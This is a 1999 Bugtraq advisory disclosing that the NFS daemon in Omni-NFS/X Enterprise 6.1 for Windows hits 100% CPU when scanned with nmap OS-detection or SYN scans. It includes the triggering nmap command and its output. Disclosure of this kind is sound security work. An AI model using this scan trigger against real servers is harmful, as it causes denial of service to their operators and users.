=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


 Date: Ср, 06 окт 1999  11:18:13

   От: "S.Faust" <sfaust@ISI-MTL.COM>

 Кому: BUGTRAQ@SECURITYFOCUS.COM

 Тема: Omni-NFS/X Enterprise  (nfsd.exe) DOS

--------------------------------------------------------------------------------




Faulty software

---------------



Omni-NFS/X Enterprise version 6.1



Product

---------



Omni-NFS/X Enterprise  is a X, NFS server solution for win32 systems.

It is written by XLink Technology ( http://www.xlink.com ) .



Vulnerability

-------------



The nfs daemon ( nfsd.exe ) used by Omni-NFS/X will jump to 100% cpu usage

if you scan it

using nmap with ether the -O (OS detect ) or the -sS ( TCP SYN (half open) )

.



Example :



(zorkeres@rh-mindlab)(Omni-X)(06/10/99) (1007)

$ nmap -O -p 111 slacky



Starting nmap V. 2.3BETA5 by Fyodor (fyodor@dhp.com, www.insecure.org/nmap/)

Interesting ports on slacky (192.168.1.2):

Port    State       Protocol  Service

111     open        tcp       sunrpc



TCP Sequence Prediction: Class=trivial time dependency

                         Difficulty=2 (Trivial joke)

Remote operating system guess: Windows NT4 / Win95 / Win98



Nmap run completed -- 1 IP address (1 host up) scanned in 1 second

(zorkeres@rh-mindlab)(Omni-X)(06/10/99) (1008)

$



This was tested on  Microsoft Windows NT 4.0 Workstation with SP5 .

I'm preaty sure all their NFS solutions are affected by this.



------------------------------------------------

Sacha Faust sfaust@isi-mtl.com

"He who despairs of the human condition is a coward, but he who has hope for

it is a fool. " - Albert Camus